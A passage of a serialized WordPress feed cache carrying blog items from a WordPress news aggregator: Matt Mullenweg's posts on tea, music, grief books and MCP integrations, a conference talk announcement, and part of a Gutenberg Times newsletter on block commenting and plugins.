Podcasting\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108690\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://openchannels.fm/why-open-source-matters-in-podcasting/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:156:\"Podcasters face limitations with closed platforms. But there are those who do advocate for tools  to boost data ownership and customization in the industry.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 Sep 2025 12:29:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"Open Channels FM: Exploring WordPress, Textcasting, and Open Web Standards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=110341\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://openchannels.fm/exploring-wordpress-textcasting-and-open-web-standards/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:256:\"In this episode of Fediverse Flows, Matthias Pfefferle chats with Dave Winer about the open web\'s evolution, emphasizing interoperability, linking, and decentralized publishing through WordPress, while discussing challenges faced by contemporary platforms.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 Sep 2025 09:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Matt: Post-Earthquake Tea Grit\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149908\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://ma.tt/2025/09/tea/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1551:\"<p>The 4.7 earthquake definitely disturbed my sleep last night, so it&#8217;s nice to have a <a href=\"https://cuzenmatcha.com/\">Cuzen Matcha</a> shot and some <a href=\"https://www.harney.com/products/paris-tea\">Harney &amp; Sons Paris tea</a> to wake up and get me through the day.</p>\n\n\n\n<figure class=\"wp-block-image alignwide size-large\"><img alt=\"\" class=\"wp-image-149909\" height=\"453\" src=\"https://i0.wp.com/ma.tt/files/2025/09/IMG_0007-1024x768.jpeg?resize=604%2C453&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<p>Speaking of spilling tea, I had a great conversation with <a href=\"https://www.linkedin.com/in/joubin-mirzadegan-66186854/\">Joubin Mirzadegan</a> of the storied VC firm <a href=\"https://www.kleinerperkins.com/\">Kleiner Perkins</a> where we got to chat about the hero&#8217;s journey of entrepreneurship, my earliest &#8220;Hot Nacho&#8221; WordPress scandal and the context of current battles, 996 work, jazz clubs in San Francisco, and more. Kleiner never invested in Automattic (I don&#8217;t think we ever pitched) but I have always had huge respect for John Doerr, Brook Byers, Bing Gordon, Mary Meeker, Ilya Fushman, and Mamoon Hamid, so many of the people at KPCB.  You can <a href=\"https://www.youtube.com/watch?v=xQDNgy774sg\">watch on YouTube</a> or <a href=\"https://pca.st/mggq43pb\">listen in Pocket Casts</a>.</p>\n\n\n\n<figure class=\"wp-block-embed alignwide is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 Sep 2025 01:17:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: Work With Music\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149893\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://ma.tt/2025/09/work-with-music/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:908:\"<p>If you&#8217;re not playing music while you&#8217;re working, you&#8217;re missing out. It&#8217;s incredible how sounds can transform how our brain works. You can, on tap, put yourself into a different mode of being with music; you can change your drive, motivation, mood, and more. There are some apps that have started to hack this, such as <a href=\"https://endel.io/\">Endel</a>, which can generate music programmatically in a very <a href=\"https://www.brian-eno.net/\">Brian Eno</a>-like way. I&#8217;ve been a fan and user of theirs since 2020. I also love the <a href=\"https://www.youtube.com/c/LofiGirl\">Lofi Girl</a>. On your <a href=\"https://www.sonos.com/\">Sonos</a> you can actually stream <a href=\"https://www.focusatwill.com/\">Focus @ Will</a>, which is another attempt, and I have a subscription there. My favorite is Endel, though, so if you&#8217;re only going to try one, try that one.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 22 Sep 2025 04:34:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Peter Wilson: I’m speaking at Web Directions Enqueue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://peterwilson.cc/?p=6715\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://peterwilson.cc/im-speaking-at-web-directions-enqueue/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1744:\"<p>I’m thrilled to be part of the line up for <a href=\"https://webdirections.org/enqueue/\">Web Directions Enqueue</a>, co presented by The Code Company, on November 28, 2025. Enqueue is to be one of the first engineering focused WordPress conferences in Australia, and the line up includes some of the best engineering minds in WordPress today, including <a href=\"https://www.jonoalderson.com/\">Jono Alderson</a>, <a href=\"https://tammielister.com/\">Tammie Lister</a>, <a href=\"https://isabelbrison.com/\">Isabel Brison</a>, <a href=\"https://cameronjonesweb.com.au/\">Cameron Jones</a> and too many more to mention.</p>\n\n\n\n<p>I’ll be doing a deep dive into the performance improvements WordPress Contributors have added to the Query classes in recent years. </p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>The WordPress Performance team was established in 2021 with the goal of improving the performance of WordPress Core. As a fundamental part of rendering each and every page of a WordPress site, the <code>WP_Query</code> class has received a lot of attention.</p>\n\n\n\n<p>In this talk, Peter will discuss how the performance of <code>WP_Query</code> and the WordPress Query component have been improved with increased caching, and how that can be taken full advantage of when building WordPress sites at scale.</p>\n</blockquote>\n\n\n\n<p>There will also be talks about integrating WordPress with LLMs, accessibility and developer workflows.</p>\n\n\n\n<p>Enqueue is taking place in Sydney on November 28, 2025 in the beautiful Dr Chau Chak Wing Building at UTS (the paper bag building). It will also be streamed via <a href=\"https://conffab.com/\">Conffab</a> if you’re unable to make it in person.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 21 Sep 2025 10:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Peter Wilson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"Matt: Books on Grieving\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149866\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://ma.tt/2025/09/books-on-grieving/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:844:\"<p>When my father passed unexpectedly, I was despondent. One thing I remember was the Amazon lovebomb I got from my high school girlfriend Sunaina Sondhi, five books to help me deal with the pain. Even a decade after we dated, books were her love language; in fact, she had given me my very first book about meditation when we were teenagers. I don&#8217;t recall what all the books were, but the two that really made a difference for me were Elisabeth Kübler-Ross’s and David Kessler&#8217;s posthumous book <a href=\"https://www.amazon.com/Grief-Grieving-Finding-Meaning-Through/dp/1476775559\">On Grief and Grieving</a>, and the <a href=\"https://www.amazon.com/Tibetan-Book-Living-Dying-International-ebook/dp/B000FC147G/\">Tibetan Book of Living and Dying</a>. Each allowed me to process and understand the emotions I was going through.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 21 Sep 2025 02:28:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Matt: MCP Everywhere\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149849\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"https://ma.tt/2025/09/mcp-everywhere/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1917:\"<p>MCP stands for <a href=\"https://modelcontextprotocol.io/\">Model Context Protocol</a>. (The joke is the S in MCP stands for security, but that&#8217;s another post.) They say to think of it like &#8220;like a USB-C port for AI applications&#8221; because it allows interoperability between AI chatbots and other tools. Here&#8217;s some of the MCP stuff happening across the <a href=\"https://automattic.com/\">Automattic</a> solar system:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Core WordPress now has <a href=\"https://github.com/WordPress/mcp-adapter/\">an MCP Adapter</a> that uses a new <a href=\"https://make.wordpress.org/ai/2025/07/17/abilities-api/\">Abilities API</a> to do <a href=\"https://en.wikipedia.org/wiki/Create,_read,_update_and_delete\">CRUD</a> and more operations across WordPress.</li>\n\n\n\n<li>Woo&#8217;s core MCP is coming in version 10.3 in early October, though <a href=\"https://github.com/techspawn/woocommerce-mcp-server\">Lawrence Sinclair already spun one up on Github</a>.</li>\n\n\n\n<li><a href=\"https://library.clay.earth/hc/en-us/articles/36405339564315-Clay-MCP-live-Make-integration-improved-Library-and-more\">Here&#8217;s how to set up Clay&#8217;s MCP</a> so your AI can ask things like &#8220;Who are my contacts at Google that I haven&#8217;t spoken to in 6 months?&#8221;</li>\n\n\n\n<li><a href=\"https://www.beeper.com/desktop-api\">Beeper&#8217;s MCP implementation</a> lets you query your entire message history across iMessage (on MacOS), WhatsApp, Telegram, Signal, Instagram, and many more with natural language.</li>\n\n\n\n<li>Day One has a <a href=\"https://github.com/Quevin/mcp-dayone/\">community MCP implementation from Kevin Davinson</a>.</li>\n</ul>\n\n\n\n<p>When nerds start connecting things, interesting stuff happens; that&#8217;s been my entire career, so while none of these have made it into a critical daily workflow for me, I&#8217;m curious to see what people come up with.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 20 Sep 2025 01:41:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"Gutenberg Times: Block commenting, fun with Telex, from classic to block theme—Weekend Edition 341\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=41913\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"https://gutenbergtimes.com/block-commenting-fun-with-telex-from-classic-to-block-theme-weekend-edition-341/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:21347:\"<p>Hi there,</p>\n\n\n\n<p>A month before Beta, is the time I get excited about a major release. Many new features—I see it all coming together via GitHub and Trac. The Source of Truth is in the works, but it will take a few more weeks to be published, as only when Release candidate 2 comes out I can be sure about what actually made it into the release. </p>\n\n\n\n<p>Until then, check out <a href=\"https://telex.automattic.ai/\"><strong>Automattic Telex</strong></a> for your personal block-building needs. Below you learn from others who went before you. </p>\n\n\n\n<p>Today the 190th <a href=\"https://www.br.de/nachrichten/bayern/oktoberfest-munich-2025-its-tapped-live-with-english-commentary,Ux8oig2\">Oktoberfest 2025 started in Munich</a>. Should you be in town, give serendipity a chance and let me know. We could meet up. </p>\n\n\n\n<p>Enjoy the weekend regardless of where you are. </p>\n\n\n\n<p>Yours, <img alt=\"💕\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f495.png\" style=\"height: 1em;\" /><br /><em>Birgit</em></p>\n\n\n<section class=\"wp-block-newsletterglue-group\" style=\"padding-top: 10px; padding-bottom: 10px; padding-left: 20px; padding-right: 20px; margin-top: 0px; margin-bottom: 0px;\">\n<div class=\"wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<p><strong>Table of Contents</strong></p>\n\n\n\n<nav class=\"wp-block-table-of-contents\"><ol><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/block-commenting-fun-with-telex-from-classic-to-block-theme-weekend-edition-341/#0-word-press-release-information\">Developing Gutenberg and WordPress</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/block-commenting-fun-with-telex-from-classic-to-block-theme-weekend-edition-341/#0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</a><ol><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/block-commenting-fun-with-telex-from-classic-to-block-theme-weekend-edition-341/#building-blocks-with-telex\">Building blocks with Telex</a></li></ol></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/block-commenting-fun-with-telex-from-classic-to-block-theme-weekend-edition-341/#2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/block-commenting-fun-with-telex-from-classic-to-block-theme-weekend-edition-341/#3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor.</a></li></ol></nav>\n</div></div>\n</section>\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\"></div>\n\n\n<h2 class=\"wp-block-heading\" id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<p><img alt=\"🎙\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f399.png\" style=\"height: 1em;\" /> The latest episode is <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-120-wordcamp-us-telex-gutenberg-21-4-and-21-5/\">Gutenberg Changelog 120—WordCamp US, Automattic Telex, Gutenberg 21.4 and 21.5, and the need for more blocks</a> with special guest <strong>Sarah Norris. </strong></p>\n\n\n\n<figure class=\"wp-block-image size-full is-style-no-vertical-margin\"><img alt=\"\" class=\"wp-image-41771\" height=\"207\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-05-at-14.12.23-edited.png?resize=652%2C207&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<p class=\"has-small-font-size\"><em>If you are listening via Spotify, please leave a comment. If you listen via other podcast apps, please leave a review. It&#8217;ll help with the distribution.</em></p>\n</div></div>\n\n\n\n<p>Block-level commenting is Gutenberg Phase 3 feature and in very active development. Although still experimental, it is worth testing now, as it heads to WordPress 6.9. </p>\n\n\n\n<p><strong>Aki Hamano</strong>, core contributor to Gutenberg, has created the <a href=\"https://github.com/t-hamano/block-commenting-data-generator\"><strong>Block Commenting Data generator</strong></a> plugin to help him streamline his testing process for this feature. The plugin is available on GitHub, and it is not for use in a production environment. On activation it creates users, comments, and other data. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><a href=\"https://github.com/WordPress/gutenberg/releases/tag/v21.7.0-rc.1\"><strong>Gutenberg 21.7 Release candidate</strong></a> is now available for testing. It&#8217;ll be released on September 23, 2025. Block Commenting is a big part, as are DataForms improvements and write mode updates. </p>\n\n\n\n<p>As a side note: You don&#8217;t have to wait for the next Gutenberg release to test things. You can use the <a href=\"https://bit.ly/playground-nightly\"><strong>Gutenberg Nightly with Playground</strong></a></p>\n\n\n<section class=\"wp-block-newsletterglue-callout undefined not-color-set\" style=\"border-color: #eeeeee; border-radius: 26px; border-style: solid; border-width: 0; padding-top: 20px; padding-bottom: 20px; padding-left: 20px; padding-right: 20px; text-align: left; margin-left: 0; margin-right: 0; margin-top: 0px; margin-bottom: 0px; background-color: #f3efe9;\">\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. </p>\n\n\n\n<p>Now also available via <a href=\"https://playground.wordpress.net/?blueprint-url=https://gutenbergtimes.com/wp-content/uploads/2020/11/playnightly.json\">WordPress Playground</a>. There is no need for a test site locally or on a server. Have you been using it? <a href=\"mailto:pauli@gutenbergtimes.com\">Email me </a>with your experience</p>\n</section>\n\n\n<h2 class=\"wp-block-heading\" id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p>Check out <strong>Wes Theron&#8217;</strong>s latest video where he shows you <strong><a href=\"https://www.youtube.com/watch?v=1Lut6UcS5Fg\">how to build one-of-a-kind page layouts in WordPress.</a></strong> He dives into crafting a clean, distraction-free landing page, promoting a special event, and even how to give a specific page its own unique header and footer. Custom templates are totally where it&#8217;s at!</p>\n\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\">\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n</div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Justin Tadlock</strong> updated his <a href=\"https://wordpress.org/plugins/x3p0-progress/\"><strong>Progress Bar</strong></a> Block plugin to v 2.0. It now supports Core features like drop <code>shadow</code>, blockGap and layout controls. It&#8217;s a feature-rich block that feels at home in the block editor, using the known interface components in the sidebar.</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img alt=\"Justin Tadlock\'s Progress Bar block plugin from the WordPress plugin repository. \" class=\"wp-image-41943\" height=\"351\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-20-at-09.55.32.png?resize=652%2C351&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Dennis Buchwald,</strong> founder of the <em>dbw-media</em> agency in Germany, released his first plugin into the WordPress plugin directory, <a href=\"https://wordpress.org/plugins/infinite-logo-carousel-block/\"><strong>an infinite logo carousel block.</strong></a> You upload all the logos into the media library and into the block editor, and it displays a logo carousel with customizable speed, spacing, and hover-pause. A great way to display client, partner, or sponsor logos scrolling over your website. You can even control the overlay at the two sides. This one is a slight pink. It&#8217;s also on brand for <em>dbw-media.</em> </p>\n\n\n\n<p>Welcome to the open-source community of WordPress plugin developers, Dennis Buchwald at <a href=\"https://dbw-media.de/\">dbw-media.de</a> <img alt=\"🎉\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f389.png\" style=\"height: 1em;\" /></p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img alt=\"infinite logo carousel by Dennis Buckwald\" class=\"wp-image-41952\" height=\"95\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-20-at-11.04.40.png?resize=652%2C95&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"building-blocks-with-telex\">Building blocks with Telex</h3>\n\n\n\n<p><a href=\"https://telex.automattic.ai/\"><strong>Automattic Telex</strong></a> is like the next big thing in block building, all thanks to natural language! Just tell it what you’re dreaming up, and Telex will whip up the code, package it as a plugin, and you can test it out right away. It’s still experimental, but honestly, there’s no better time to start making your ideas into real WordPress 